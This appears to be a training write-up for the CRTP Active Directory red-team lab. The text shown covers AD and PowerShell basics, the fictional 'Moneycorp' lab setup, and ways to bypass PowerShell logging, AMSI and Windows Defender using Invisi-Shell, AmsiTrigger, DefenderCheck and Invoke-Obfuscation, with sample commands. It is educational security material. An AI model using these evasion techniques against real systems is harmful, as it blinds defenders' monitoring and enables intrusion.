Certified Red Team Professional

Disclaimer

Before proceeding with any red team or penetration testing activities, it is essential to obtain explicit
permission from the relevant authorities and ensure compliance with all applicable laws and regulations.
Unauthorized access to systems or data is illegal and unethical. This document is intended for educational
purposes only and should not be used for malicious activities.

The information contained in this document is accurate to the best of my knowledge and is provided with
the intention of educating and informing readers about red team operations and penetration testing
techniques. However, the reader is advised to conduct their own research and verification.
Contents
Introduction ................................................................................................................................................ 10
Intended Audience .................................................................................................................................. 10
Who Should Read This Document ...................................................................................................... 10
Prerequisites ........................................................................................................................................... 10
Course Approach and Methodology ....................................................................................................... 10
Key Features of the Course Approach ................................................................................................ 11
Active Directory and PowerShell: Foundations for Red Teaming ............................................................... 12
Active Directory ...................................................................................................................................... 12
PowerShell .............................................................................................................................................. 14
Key Features of PowerShell ................................................................................................................ 14
Benefits of Using PowerShell .............................................................................................................. 15
Enhanced Logging and Security Features in PowerShell ........................................................................ 15
System-Wide Transcription ................................................................................................................. 15
Script Block Logging ............................................................................................................................ 16
Antimalware Scan Interface (AMSI) .................................................................................................... 16
Constrained Language Mode (CLM).................................................................................................... 16
Benefits of Enhanced Logging and Security Features ......................................................................... 16
Bypassing PowerShell security ................................................................................................................ 17
Avoiding Command History ................................................................................................................ 17
Bypassing Script Block Logging ........................................................................................................... 17
Evading AntiMalware Scan Interface (AMSI) ...................................................................................... 17
Utilizing .NET Framework.................................................................................................................... 17
Dynamic Code Execution .................................................................................................................... 17
Memory-Resident Execution .............................................................................................................. 18
How Invisi-Shell Works............................................................................................................................ 18
Hooking .NET Assemblies .................................................................................................................... 18
Using CLR Profiler API ......................................................................................................................... 18
Common Language Runtime (CLR) Profiler......................................................................................... 18
Using Invisi-Shell ..................................................................................................................................... 18
Capabilities of Invisi-Shell ................................................................................................................... 18
With Admin Privileges ......................................................................................................................... 19
With Non-Admin Privileges ................................................................................................................. 19
 Completing the Clean-Up .................................................................................................................... 19
Advanced Techniques for Bypassing PowerShell Security Controls ....................................................... 19
Loading Scripts in Memory ................................................................................................................. 19
Bypassing Signature-Based Detection by Windows Defender ........................................................... 20
Lab Environment ......................................................................................................................................... 22
Assume Breach Execution Cycle ............................................................................................................. 22
Red Teaming ....................................................................................................................................... 22
Insider Attack Simulation .................................................................................................................... 22
Blue Teaming....................................................................................................................................... 23
Execute Post Breach............................................................................................................................ 23
Monitor Emerging Threats .................................................................................................................. 23
Wargame Exercises ............................................................................................................................. 23
Target Environment ................................................................................................................................ 23
Moneycorp .......................................................................................................................................... 23
Moneycorp Environment Details ........................................................................................................ 23
Lab Access ........................................................................................................................................... 24
Lab Tools and Resources ..................................................................................................................... 24
IP Addresses ........................................................................................................................................ 24
Insider attack simulation phase .......................................................................................................... 25
Active Directory Enumeration .................................................................................................................... 27
Tools for Enumeration ............................................................................................................................ 27
Enumeration Techniques ........................................................................................................................ 28
Loading the Active directory Module ..................................................................................................... 28
Loading the Powerview script ................................................................................................................. 28
Domain Enumeration .............................................................................................................................. 29
Using AD Module ................................................................................................................................ 29
Using PowerView ................................................................................................................................ 36
Using .net Methods and nslookup ...................................................................................................... 41
User Enumeration ................................................................................................................................... 43
Using AD Module ................................................................................................................................ 43
Using PowerView ................................................................................................................................ 45
Computer Enumeration .......................................................................................................................... 46
Using AD Module ................................................................................................................................ 46
 Using PowerView ................................................................................................................................ 47
Group Enumeration ................................................................................................................................ 48
Using AD Module .................................................................................................................................... 48
Using PowerView .................................................................................................................................... 50
Sessions Enumeration ............................................................................................................................. 58
Using Powerview................................................................................................................................. 58
Shares Enumeration ................................................................................................................................ 59
Using Powerview................................................................................................................................. 59
GPO Enumeration ................................................................................................................................... 60
Using PowerView .................................................................................................................................... 60
ACL Enumeration .................................................................................................................................... 67
Access Control Model ......................................................................................................................... 67
Using Powerview................................................................................................................................. 67
User Hunting ......................................................................................................................................... 129
Using PowerView .............................................................................................................................. 129
Local Privilege Escalation .......................................................................................................................... 138
Disable Defender using PowerShell ...................................................................................................... 142
Jenkins Feature Abuse .............................................................................................................................. 143
Getting a Reverse shell ......................................................................................................................... 143
Tools required ................................................................................................................................... 143
Domain Enumeration using BloodHound ................................................................................................. 146
Introduction to BloodHound ................................................................................................................. 146
Components of BloodHound ................................................................................................................ 146
SharpHound ...................................................................................................................................... 146
BloodHound Interface ....................................................................................................................... 146
Setting up BloodHound environment ................................................................................................... 146
Prerequisites ..................................................................................................................................... 146
Installation of neo4j database .......................................................................................................... 146
How BloodHound Collects Data ............................................................................................................ 148
LDAP Enumeration ............................................................................................................................ 148
SMB and RPC Enumeration ............................................................................................................... 148
Active Directory Web Services (ADWS) ............................................................................................ 148
Event Logs ......................................................................................................................................... 148
 Types of Data Collected ........................................................................................................................ 149
Data Collection Methods ...................................................................................................................... 149
Using SharpHound ................................................................................................................................ 149
Issue with Derivate Local Admin and BloodHound 4.2.0 ...................................................................... 153
Lateral Movement..................................................................................................................................... 157
The stages of lateral movement ........................................................................................................... 157
Reconnaissance ................................................................................................................................. 157
Credential dumping .......................................................................................................................... 158
Gaining access ................................................................................................................................... 159
PowerShell Remoting ............................................................................................................................ 159
Overview of PowerShell Remoting ................................................................................................... 159
Enabling PowerShell Remoting ......................................................................................................... 159
Using PowerShell Remoting .............................................................................................................. 160
Dumping LSASS Credentials .................................................................................................................. 161
Dumping Credentials from LSASS ..................................................................................................... 161
Overpass the Hash attacks .................................................................................................................... 162
DCSync attack........................................................................................................................................ 163
NetLoader ............................................................................................................................................. 163
Lateral Movement – 1 ........................................................................................................................... 164
Dumping Credentials......................................................................................................................... 164
OverPass the Hash Attack ................................................................................................................. 175
Lateral Movement – 2 (Using Derivative Admin).................................................................................. 183
Dumping credentials on DCORP-ADMINSRV .................................................................................... 185
OverPass The Hash ............................................................................................................................ 190
Domain Persistence .................................................................................................................................. 205
Introduction to Kerberos ...................................................................................................................... 205
Key Concepts of Kerberos ................................................................................................................. 205
How Kerberos works ......................................................................................................................... 206
DCSync attack........................................................................................................................................ 209
Enumeration ..................................................................................................................................... 209
Execution........................................................................................................................................... 212
Dumping all hashes from Domain Controller ....................................................................................... 223
Using Invoke-Mimi ............................................................................................................................ 223
 Using SafetyKatz................................................................................................................................ 236
Golden Ticket Attack ............................................................................................................................. 251
Execution........................................................................................................................................... 251
Persistence ........................................................................................................................................ 260
Silver ticket attack ................................................................................................................................. 260
Stealthiness of Silver Tickets ............................................................................................................. 261
Dumping Credentials of the service accounts .................................................................................. 261
Execution........................................................................................................................................... 266
Persistence ........................................................................................................................................ 279
Diamond Ticket Attack .......................................................................................................................... 279
Execution........................................................................................................................................... 280
Persistence ........................................................................................................................................ 283
Skeleton Key attack ............................................................................................................................... 283
Requirements .................................................................................................................................... 283
Execution........................................................................................................................................... 283
Persistence ........................................................................................................................................ 286
DSRM attack .......................................................................................................................................... 286
Persistence ........................................................................................................................................ 289
Persistence using ACL ........................................................................................................................... 289
AdminSDHolder................................................................................................................................. 289
Rights Abuse...................................................................................................................................... 293
Using ACLs - Security Descriptors ..................................................................................................... 299
Remote Registry back door ................................................................................................................... 305
Domain Privilege Escalation ...................................................................................................................... 311
Kerberoasting ........................................................................................................................................ 311
How Kerberoasting Works ................................................................................................................ 311
Enumeration ..................................................................................................................................... 311
Performing the attack ....................................................................................................................... 323
Mitigation.......................................................................................................................................... 327
Targeted Kerberoasting (AS-REP Roasting)........................................................................................... 327
How AS-REP Roasting Works ............................................................................................................ 327
Enumeration ..................................................................................................................................... 327
Kerberoasting - SET SPN........................................................................................................................ 348
 Kerberos Delegation ............................................................................................................................. 349
Unconstrained Delegation ................................................................................................................ 349
Constrained Delegation ........................................................................................................................ 359
Kerberos Only.................................................................................................................................... 360
Protocol Transition............................................................................................................................ 360
Enumeration ..................................................................................................................................... 361
Performing the attack ....................................................................................................................... 364
Resource based Constrained Delegation .............................................................................................. 381
Cross Domain Attacks ............................................................................................................................... 392
Kerberos across trusts........................................................................................................................... 392
Privilege escalation to Enterprise Admins abusing SID history and trust key ...................................... 394
SID History ......................................................................................................................................... 394
Getting the RC4 or AES hash of the trust key ....................................................................................... 394
DCSync attack.................................................................................................................................... 394
Invoke-Mimi ...................................................................................................................................... 399
Forging inter-realm TGT ........................................................................................................................ 413
Using BetterSafetyKatz.exe ............................................................................................................... 413
Using Rubeus..................................................................................................................................... 415
Privilege escalation to Enterprise Admins using krbtgt ........................................................................ 421
Using BetterSafetyKatz.exe ............................................................................................................... 422
Cross Forest attacks .................................................................................................................................. 428
Getting the RC4 or AES hash of the trust key ....................................................................................... 428
DCSync attack.................................................................................................................................... 428
Invoke-Mimi ...................................................................................................................................... 432
Forging Inter-Realm TGT ....................................................................................................................... 445
ADCS abuse ............................................................................................................................................... 449
Components of ADCS ............................................................................................................................ 449
Enumerating ADCS ................................................................................................................................ 449
Common misconfigurations for Domain Privilege escalation path ...................................................... 451
Enrollee can enroll certificate for any user ........................................................................................... 451
Explanation of the Misconfiguration ................................................................................................ 451
Escalation to Domain Administrator ................................................................................................. 462
Escalation to Enterprise Administrator ................................................................................................. 466
MS SQL Servers abuse ............................................................................................................................... 471
Enumeration ......................................................................................................................................... 471
Listing SQL Servers ............................................................................................................................ 471
Test Connectivity............................................................................................................................... 472
Extracting information ...................................................................................................................... 473
Abusing MSSQL Servers Database Links ............................................................................................... 474
Enumeration ..................................................................................................................................... 474
Getting a reverse shell .......................................................................................................................... 478
Detection and Defense ............................................................................................................................. 480
Protect and Limit Domain Admins ........................................................................................................ 480
Protected Users Group ......................................................................................................................... 480
Prerequisites ..................................................................................................................................... 480
Protections applied by Active Directory ........................................................................................... 480
Device protections for signed in Protected Users ............................................................................ 480
Domain controller protections for Protected Users ......................................................................... 481
Isolate Administrative workstations ..................................................................................................... 481
Privileged Administrative workstations ............................................................................................ 481
Secure Local Administrators ............................................................................................................. 481
Time Bound Administration .................................................................................................................. 482
Just in Time (JIT) administration ....................................................................................................... 482
Just Enough Administration (JEA) ..................................................................................................... 482
Tier Model ............................................................................................................................................. 482
Introduction
This document outlines the various attacks and techniques used during the Certified Red Team
Professional (CRTP) lab. It covers the setup of the lab environment, the methods employed for
enumeration, privilege escalation, lateral movement, persistence, and evasion, as well as the findings and
recommendations based on the lab results.

Intended Audience
This document is designed for cybersecurity professionals and enthusiasts who have completed the
Certified Red Team Professional (CRTP) lab. The course assumes no previous experience with Active
Directory security but expects that the reader has a foundational understanding of Active Directory
concepts.

Who Should Read This Document

1. Beginner Cybersecurity Professionals: Individuals new to the field of cybersecurity who wish to
gain practical experience in Red Teaming and Active Directory security.

2. IT Professionals: System administrators and IT staff who have a basic understanding of Active
Directory and are looking to enhance their knowledge of security practices and Red Team
techniques.

3. Security Enthusiasts: Hobbyists and learners with a basic grasp of Active Directory who are
interested in exploring offensive security methods and improving their skill set.

4. Students: Individuals pursuing education in cybersecurity or related fields who seek practical,
hands-on experience with Red Teaming and Active Directory environments.

5. Red Team Aspirants: Professionals aiming to specialize in Red Team operations and wishing to
build a strong foundation in Active Directory security and attack techniques.

Prerequisites
• Basic knowledge of Active Directory concepts (e.g., domains, users, groups, and organizational
units)

• Familiarity with general networking concepts and Windows operating systems

• Basic understanding of command-line interfaces and scripting

This document will guide you through the various attacks and techniques used during the CRTP lab,
providing detailed steps, tools, and observations to enhance your learning experience and practical skills
in Red Teaming.

Course Approach and Methodology

The Certified Red Team Professional (CRTP) lab simulates a real-world Red Team operation, providing a
practical and immersive learning experience. Unlike traditional penetration testing courses that rely
heavily on exploits and exploitation frameworks, this lab emphasizes the use of built-in tools and focuses
on functionality abuse within Active Directory environments. The objective is to demonstrate how
attackers can leverage legitimate features and functionalities to achieve their goals without the need for
external exploitation tools.

Key Features of the Course Approach

• Real-World Simulation: The lab environment closely mimics real-world scenarios, offering hands-
on experience with practical Red Team operations.

• Adversary Emulation: We will emulate an adversary who has already gained a foothold in the
target domain. This involves starting with limited access and escalating privileges through various
techniques.

• Use of Built-In Tools: Emphasis is placed on utilizing native tools and commands available within
the Windows operating system and Active Directory. This includes tools like PowerShell, net
commands, and built-in Windows utilities. The goal is to avoid touching the disk on any target
server as much as possible to minimize detection.

• Functionality Abuse: The course focuses on abusing legitimate functionalities and components
within Active Directory, including AD components and trusts, to achieve various attack objectives.
Techniques include leveraging misconfigurations, exploiting default settings, and abusing user
privileges. We will not rely on any patchable exploits, highlighting the importance of
understanding and manipulating inherent system features.

• Windows as the Attack Platform: All attacks will be conducted using built-in Windows
management tools, avoiding Unix or Linux tools and operating systems. This approach enhances
stealth and flexibility, as it leverages the native environment of the target systems.

• No Exploits or Exploitation Frameworks: Unlike other courses that rely on Metasploit or other
exploitation frameworks, this lab avoids the use of external exploits. The emphasis is on
understanding and manipulating the inherent features of the system.

Learning Outcomes:

• Gain a deep understanding of how attackers can operate within a network using only built-in
Windows tools.

• Develop skills to identify and exploit misconfigurations and weaknesses in Active Directory and its
components.

• Learn to think like an attacker by leveraging functionality abuse to achieve persistence, lateral
movement, and privilege escalation.

• Understand the techniques to minimize footprint by avoiding disk access and relying on memory-
resident operations.

• Enhance stealth and flexibility by exclusively using Windows as the attack platform.

By focusing on these methods, the CRTP lab ensures that students gain practical, applicable skills that are
highly relevant in real-world Red Team engagements.
Active Directory and PowerShell: Foundations for Red
Teaming
Active Directory
Active Directory (AD) is a directory service used to manage Windows networks. It serves as a centralized
repository for storing information about objects on the network and makes this information easily
accessible to users and administrators.

Key Components of Active Directory:

• Schema: Defines objects and their attributes within the directory.

• Query and Index Mechanism: Provides searching and publication of objects and their properties,
facilitating efficient retrieval of information.

• Global Catalog: Contains information about every object in the directory, enabling cross-domain
searches and authentication.

• Replication Service: Distributes information across domain controllers, ensuring consistency and
availability of directory data.

Active Directory Structure:

Forests, domains, and organizational units (OUs) are the fundamental components of any Active Directory
structure.

• Forests: A security boundary that may contain multiple domains. It provides a means of
partitioning and organizing directory data.

• Domains: Logical groupings of objects within a forest, representing administrative boundaries.

Each domain may contain multiple OUs.

• Organization Units (OUs): Containers used for organizing and managing objects within a domain.
OUs provide a hierarchical structure for applying Group Policy settings and delegating
administrative tasks.

Active Directory enables centralized, secure management of an entire network, whether it spans a
building, a city, or multiple locations worldwide. Understanding its components and structure is essential
for effective Red Teaming operations within Windows environments.

The core of any Windows Domain is the Active Directory Domain Service (AD DS). This service acts as a
catalogue that holds the information of all of the "objects" that exist on your network. Amongst the many
objects supported by AD, we have users, groups, machines, printers, shares and many others. Let's look
at some of them:

Users

Users are one of the most common object types in Active Directory. Users are one of the objects known
as security principals, meaning that they can be authenticated by the domain and can be assigned
privileges over resources like files or printers. You could say that a security principal is an object that can
act upon resources in the network.

Users can be used to represent two types of entities:

• People: users will generally represent persons in your organisation that need to access the
network, like employees.

• Services: you can also define users to be used by services like IIS or MSSQL. Every single service
requires a user to run, but service users are different from regular users as they will only have the
privileges needed to run their specific service.

Machines

Machines are another type of object within Active Directory; for every computer that joins the Active
Directory domain, a machine object will be created. Machines are also considered "security principals"
and are assigned an account just as any regular user. This account has somewhat limited rights within the
domain itself.

The machine accounts themselves are local administrators on the assigned computer, they are generally
not supposed to be accessed by anyone except the computer itself, but as with any other account, if you
have the password, you can use it to log in.

Note: Machine Account passwords are automatically rotated out and are generally comprised of 120
random characters.

Identifying machine accounts is relatively easy. They follow a specific naming scheme. The machine
account name is the computer's name followed by a dollar sign. For example, a machine named DC01 will
have a machine account called DC01$.

Security Groups

If you are familiar with Windows, you probably know that you can define user groups to assign access
rights to files or other resources to entire groups instead of single users. This allows for better
manageability as you can add users to an existing group, and they will automatically inherit all of the
group's privileges. Security groups are also considered security principals and, therefore, can have
privileges over resources on the network.

Groups can have both users and machines as members. If needed, groups can include other groups as
well.

Several groups are created by default in a domain that can be used to grant specific privileges to users. As
an example, here are some of the most important groups in a domain:
Security Group Description

Domain Users of this group have administrative privileges over the entire domain. By default,
Admins they can administer any computer on the domain, including the DCs.

Server Users in this group can administer Domain Controllers. They cannot change any
Operators administrative group memberships.

Backup Users in this group are allowed to access any file, ignoring their permissions. They are
Operators used to perform backups of data on computers.

Account
Users in this group can create or modify other accounts in the domain.
Operators

Domain Users Includes all existing user accounts in the domain.

Domain
Includes all existing computers in the domain.
Computers

Domain
Includes all existing DCs on the domain.
Controllers

Default containers in AD

• Builtin: Contains default groups available to any Windows host.

• Computers: Any machine joining the network will be put here by default. We can move them if
needed.

• Domain Controllers: Default OU that contains the DCs in your network.

• Users: Default users and groups that apply to a domain-wide context.

• Managed Service Accounts: Holds accounts used by services in your Windows domain.

PowerShell
PowerShell is a powerful scripting language and command-line shell developed by Microsoft. It is designed
to automate administrative tasks and provide a more efficient way to manage Windows environments.
PowerShell combines the flexibility of scripting with the power of the .NET Framework, allowing
administrators to automate repetitive tasks, manage system configurations, and streamline
administrative workflows.

Key Features of PowerShell

• Object-Oriented: PowerShell treats everything as an object, including files, folders, registry keys,
and even commands themselves. This object-oriented approach allows for seamless integration
with other technologies and simplifies automation tasks.
 • Pipeline: PowerShell features a pipeline mechanism that enables the output of one command to
be passed as input to another command. This allows for the chaining of commands together,
creating powerful one-liners and facilitating complex data manipulation.

• Cmdlets: PowerShell uses cmdlets (pronounced "command-lets") as its primary mechanism for
performing tasks. Cmdlets are small, single-function commands that follow a Verb-Noun naming
convention (e.g., Get-Process, Set-Item). There are hundreds of built-in cmdlets for managing
various aspects of the Windows operating system, and administrators can also create custom
cmdlets to extend functionality.

• Scripting Language: PowerShell is a full-featured scripting language with support for variables,
loops, conditional statements, functions, and error handling. This makes it suitable for writing
complex scripts and automation workflows.

• Integration with .NET Framework: PowerShell provides seamless integration with the .NET
Framework, allowing administrators to leverage the extensive library of .NET classes and methods
in their scripts. This enables access to advanced system functions and external APIs, expanding
the capabilities of PowerShell scripts.

Benefits of Using PowerShell

• Automation: PowerShell enables administrators to automate repetitive tasks, reducing manual
effort and increasing efficiency. Tasks such as user provisioning, system configuration, and log
analysis can be easily automated using PowerShell scripts.

• Standardization: PowerShell provides a standardized framework for managing Windows

environments, ensuring consistency and reliability across systems. Administrators can use the
same set of commands and scripts to manage different servers and workstations, simplifying
administration tasks.

• Remote Management: PowerShell supports remote administration, allowing administrators to

manage Windows systems remotely over the network. This enables centralized management of
distributed environments and facilitates troubleshooting and maintenance tasks.

• Extensibility: PowerShell is highly extensible, with support for modules, snap-ins, and custom
cmdlets. Administrators can extend the functionality of PowerShell by installing additional
modules or writing their own custom cmdlets to meet specific requirements.

Enhanced Logging and Security Features in PowerShell

PowerShell incorporates a range of advanced logging and security features designed to enhance visibility,
detect malicious activity, and enforce security policies across Windows environments. These features play
a crucial role in maintaining system integrity, mitigating risks, and safeguarding against cybersecurity
threats.

System-Wide Transcription
PowerShell supports system-wide transcription logging, which captures all input and output from
PowerShell sessions across the entire system. This comprehensive logging capability records command
execution, script output, and interactive sessions, providing a detailed audit trail of PowerShell activity.
System-wide transcription logging is invaluable for compliance, forensic analysis, and incident response
purposes.

Script Block Logging

Script block logging captures the contents of PowerShell script blocks, including commands, parameters,
and additional code executed within the block. By logging script block activity, administrators can monitor
script execution, detect malicious behavior, and identify security incidents involving unauthorized script
execution or exploitation attempts.

Antimalware Scan Interface (AMSI)

PowerShell integrates with the Antimalware Scan Interface (AMSI), a standard interface that enables
antivirus and security products to scan script content for malicious code. By leveraging AMSI, PowerShell
can provide real-time threat detection and mitigation capabilities, allowing security solutions to analyze
script behavior and detect malicious activity before it executes.

Constrained Language Mode (CLM)

Constrained Language Mode (CLM) is a security feature in PowerShell that restricts the use of potentially
dangerous language elements and cmdlets. Integrated with AppLocker and Windows Defender
Application Control (WDAC, formerly Device Guard), CLM helps prevent the execution of malicious scripts
and unauthorized code by enforcing a restricted execution environment. CLM is particularly effective in
mitigating script-based attacks and preventing the exploitation of PowerShell vulnerabilities.

Benefits of Enhanced Logging and Security Features

• Improved Visibility and Control: System-wide transcription, script block logging, and other
logging features provide administrators with enhanced visibility into PowerShell activity, enabling
them to monitor and control script execution across the system.

• Advanced Threat Detection: Integration with AMSI and the enforcement of CLM help
organizations detect and mitigate script-based threats, including malware, ransomware, and
malicious scripts. By scanning script content and restricting potentially dangerous operations,
PowerShell enhances the overall security posture of Windows environments.

• Compliance and Regulatory Compliance: Enhanced logging and security features support
compliance with industry regulations and cybersecurity standards by providing comprehensive
audit trails, threat detection capabilities, and proactive security measures. Organizations can
demonstrate adherence to security policies and regulatory requirements by implementing robust
logging and security controls in PowerShell.

• Risk Mitigation and Incident Response: PowerShell's advanced logging and security features
enable organizations to mitigate risks, respond to security incidents, and prevent unauthorized
access or malicious activity. By leveraging transcription logging, script block logging, AMSI
integration, and CLM enforcement, organizations can proactively protect against cybersecurity
threats and maintain system integrity.
Bypassing PowerShell security
In the lab, we utilize Invisi-Shell for bypassing PowerShell security mechanisms. Invisi-Shell is a
sophisticated tool designed to evade PowerShell security mechanisms, allowing attackers to execute
PowerShell commands without triggering detection and logging features. Here’s a detailed look at how
Invisi-Shell achieves this:

Avoiding Command History

Invisi-Shell can execute PowerShell commands in a way that avoids recording them in the command
history. This is typically done by using techniques that bypass the standard input methods where
command history is logged. By avoiding the command history, Invisi-Shell reduces the chances of its
actions being discovered through historical command analysis.

Bypassing Script Block Logging

Script Block Logging is a powerful feature in PowerShell that logs the contents of all script blocks. Invisi-
Shell bypasses this by executing commands in a manner that doesn’t get captured by the logging
mechanism. This can be achieved through techniques such as dynamic code execution, obfuscation, or
leveraging APIs that do not trigger logging.

Evading AntiMalware Scan Interface (AMSI)

AMSI is designed to scan PowerShell scripts for malicious content before execution. Invisi-Shell can bypass
AMSI by:

• Injecting commands directly into memory, thus avoiding the standard AMSI scanning process.

• Using obfuscation techniques to modify the script content so that it is not recognized as malicious
by AMSI.

• Disabling or modifying the AMSI DLL in memory to prevent it from scanning the PowerShell
scripts.

Utilizing .NET Framework

Invisi-Shell often leverages the .NET Framework to execute PowerShell commands. By using .NET classes
and methods directly, it can bypass some of the built-in security features of PowerShell. This approach
allows the execution of commands without going through the standard PowerShell command pipeline,
thereby avoiding logging and detection.

Dynamic Code Execution

Invisi-Shell employs dynamic code execution techniques, such as reflection, to run PowerShell commands.
These methods involve generating and executing code at runtime, which can bypass static analysis and
logging mechanisms that are typically applied to scripts and commands entered directly into the
PowerShell prompt.
Memory-Resident Execution
Invisi-Shell focuses on executing commands directly in memory, avoiding disk writes that can be logged
and detected by endpoint security solutions. By operating in memory, it reduces its footprint and the
chances of being detected by traditional file-based monitoring and logging systems.

In the lab, we will use Invisi-Shell, a tool designed to bypass PowerShell's security controls. Invisi-Shell
employs advanced techniques to evade logging and detection mechanisms, allowing us to execute
PowerShell commands stealthily.

Invisi-Shell GitHub Repository

How Invisi-Shell Works

Hooking .NET Assemblies
Invisi-Shell hooks into essential .NET assemblies such as System.Management.Automation.dll and
System.Core.dll. By doing so, it bypasses the standard logging mechanisms that PowerShell employs. This
allows commands to be executed without being recorded in script block logs or other logging facilities.

Using CLR Profiler API

The tool leverages the CLR Profiler API to perform these hooks. The CLR Profiler API allows the profiler
DLL to interact with the CLR at runtime, providing a powerful means to modify the behavior of .NET
applications, including PowerShell.

Common Language Runtime (CLR) Profiler

A common language runtime (CLR) profiler is a dynamic link library (DLL) that consists of functions that
receive messages from, and send messages to, the CLR by using the profiling API. The profiler DLL is loaded
by the CLR at runtime, enabling it to monitor and manipulate the execution of .NET code. This mechanism
is what Invisi-Shell uses to inject its hooks and bypass logging.

Using Invisi-Shell
In the lab, we use an obfuscated version of Invisi-Shell to bypass PowerShell security controls. The
obfuscation ensures that the tool remains undetected by security mechanisms that would normally flag
the script from the GitHub repository.

Capabilities of Invisi-Shell
Incapacitating System-Wide Transcription

Invisi-Shell disables system-wide transcription logging, preventing the capture of all input and output from
PowerShell sessions. This means that commands executed via Invisi-Shell will not be recorded in
transcription logs, ensuring stealthy operation.
Bypassing Script Block Logging
Script block logging, which captures the contents of PowerShell script blocks, is effectively bypassed by
Invisi-Shell. This prevents detailed logging of the commands and scripts executed, making it difficult for
administrators to monitor or review the executed script content.

Evading AntiMalware Scan Interface (AMSI)

Invisi-Shell circumvents AMSI, a feature that scans PowerShell scripts for malicious content before
execution. By bypassing AMSI, Invisi-Shell allows scripts to run without being scanned or flagged by anti-
malware solutions, ensuring that potentially malicious commands execute undetected.

To bypass PowerShell security controls in the lab, we will use Invisi-Shell. Depending on the privileges
available, different scripts are used to initiate Invisi-Shell.

With Admin Privileges

1. Execute RunWithPathAsAdmin.bat

o This script is designed to run Invisi-Shell with administrative privileges, allowing it to

perform the necessary hooks and bypass security controls effectively.

With Non-Admin Privileges

1. Execute RunWithRegistryNonAdmin.bat

o This script enables Invisi-Shell to operate with non-administrative privileges, using

alternative methods to bypass logging and other security mechanisms.

Completing the Clean-Up

1. After executing the required commands, type exit in the new PowerShell session.

o This ensures that the session is properly terminated and any temporary modifications
made by Invisi-Shell are cleaned up.

By following these steps, Invisi-Shell can be used to execute PowerShell commands without triggering
logging mechanisms, aiding in understanding and demonstrating bypass techniques in a controlled lab
environment.

Advanced Techniques for Bypassing PowerShell Security Controls

In the lab, we use various advanced techniques and tools to bypass PowerShell security mechanisms,
including AMSI and signature-based detections by Windows Defender. These methods ensure that our
scripts remain undetected and can execute without interference from security tools.

Loading Scripts in Memory

To avoid detection by AMSI, we can load PowerShell scripts directly into memory. This method bypasses
AMSI scans that are typically triggered by on-disk script execution, ensuring that the scripts run without
being flagged by AMSI.
Bypassing Signature-Based Detection by Windows Defender
Windows Defender employs signature-based detection to identify and block known malicious PowerShell
scripts. Here are the tools and techniques we use to bypass these detections:

AMSITrigger
AMSITrigger GitHub Repository

AMSITrigger helps identify the exact part of a PowerShell script that triggers AMSI detections. By
pinpointing the specific code segments flagged by AMSI, we can modify or obfuscate these parts to evade
detection.

Usage
AmsiTrigger_x64.exe -i C:\AD\Tools\Invoke-PowerShellTcp_Detected.ps1

Identify Detected Parts

Use AMSITrigger to find specific parts of the script that trigger AMSI detections.
AmsiTrigger_x64.exe -i C:\AD\Tools\Invoke-PowerShellTcp_Detected.ps1
DefenderCheck
DefenderCheck GitHub Repository

DefenderCheck is a tool designed to identify code and strings within a binary or script file that Windows
Defender flags as malicious. By scanning the script with DefenderCheck, we can determine which parts of
the code need to be altered or obfuscated to avoid detection.

Usage
DefenderCheck.exe PowerUp.ps1

Scan for Defender Flags

Use DefenderCheck to scan the script and identify code or strings flagged by Windows Defender.
DefenderCheck.exe PowerUp.ps1

Full Obfuscation with Invoke-Obfuscation

Invoke-Obfuscation GitHub Repository

For comprehensive obfuscation of PowerShell scripts, we use Invoke-Obfuscation. This tool allows us to
obfuscate the entire script, including any AMSI bypass code, making it difficult for Windows Defender and
other security tools to detect malicious content.

Invoke-Obfuscation provides various obfuscation techniques, such as encoding, string manipulation, and
variable renaming, to transform the script into a form that is challenging for signature-based detection to
analyze.
Usage
Import-Module .\Invoke-Obfuscation.psd1
Invoke-Obfuscation

Apply Obfuscation

Use Invoke-Obfuscation to obfuscate the entire script, ensuring it can evade both AMSI and Windows
Defender.
Import-Module .\Invoke-Obfuscation.psd1
Invoke-Obfuscation
Lab Environment
Assume Breach Execution Cycle
Insider Attack Simulation is an important part of the Assume Breach Execution Cycle. In the course, we
are going to use the Assume Breach Methodology on an Active Directory environment and utilize the
internal access available to an adversary to perform further attacks. Here is a detailed look at the Assume
Breach Execution Cycle

Red Teaming
Red teaming involves simulating real-world attacks to test the effectiveness of an organization's security
measures. In this phase, we identify vulnerabilities and weaknesses in the Active Directory environment
by mimicking the actions of a malicious actor.

Insider Attack Simulation

This phase focuses on simulating attacks that originate from within the organization. Using the Assume
Breach Methodology, we assume that the adversary already has a foothold in the network. This simulation
helps to understand the impact of insider threats and the potential damage that can be inflicted.
Blue Teaming
Blue teaming is the defensive counterpart to red teaming. In this phase, security teams work to detect,
respond to, and mitigate the attacks simulated by the red team. The goal is to improve the organization’s
defense mechanisms and incident response strategies.

Execute Post Breach

In the post-breach phase, actions are taken based on the findings from the red and blue team exercises.
This includes remediation of identified vulnerabilities, strengthening security controls, and enhancing
detection and response capabilities.

Monitor Emerging Threats

Continuous monitoring for emerging threats is crucial to maintaining a robust security posture. This phase
involves staying updated on the latest threat intelligence and adapting security strategies to counter new
attack vectors.

Wargame Exercises
Wargaming involves conducting regular exercises to simulate various attack scenarios. These exercises
help in preparing the organization for potential breaches and improving the coordination between
different security teams.

By following the Assume Breach Execution Cycle, organizations can better prepare for and respond to
security incidents, ensuring a comprehensive approach to cybersecurity.

Target Environment
Moneycorp
In this class, we are targeting the Active Directory environment of a fictional financial services company
called 'Moneycorp'. The lab environment is designed to provide realistic and challenging scenarios for
practicing red team techniques.

Moneycorp Environment Details

• Operating Systems:

o Fully patched Server 2022 machines with Windows Defender.

o Server 2016 Forest Functional Level.

• Active Directory Structure:

o Multiple forests.

o Multiple domains.

• Network Configuration:

o Minimal firewall usage to focus more on understanding and practicing concepts rather
than firewall configurations.
Lab Access
• Log on to Moneycorp AD Lab for accessing the lab environment.

By simulating an environment similar to that of a real-world financial services company, the lab provides
an excellent platform for learning and applying the Assume Breach Methodology and various red team
techniques on Active Directory.

Lab Tools and Resources

We're provided access to the lab as a very low privileged domain user (STUDENT163) and access to a
domain-joined machine (DCORP-STD163). All the tools required for the lab are provided in the directory
C:\AD\Tools\. This ensures that you have immediate access to all necessary resources for performing the
exercises and practicing the techniques taught in the course.

IP Addresses
In scope:172.16.1.0/24 -172.16.17.0/24

Everything else is NOT in scope. The IP address of the student machine is 172.16.100.163.
C:\Users\student163>ipconfig

Windows IP Configuration

Ethernet adapter Ethernet 5:

Connection-specific DNS Suffix . :

Link-local IPv6 Address . . . . . : fe80::7b8a:9cbf:fb30:de74%18
IPv4 Address. . . . . . . . . . . : 172.16.100.163
Subnet Mask . . . . . . . . . . . : 255.255.255.0
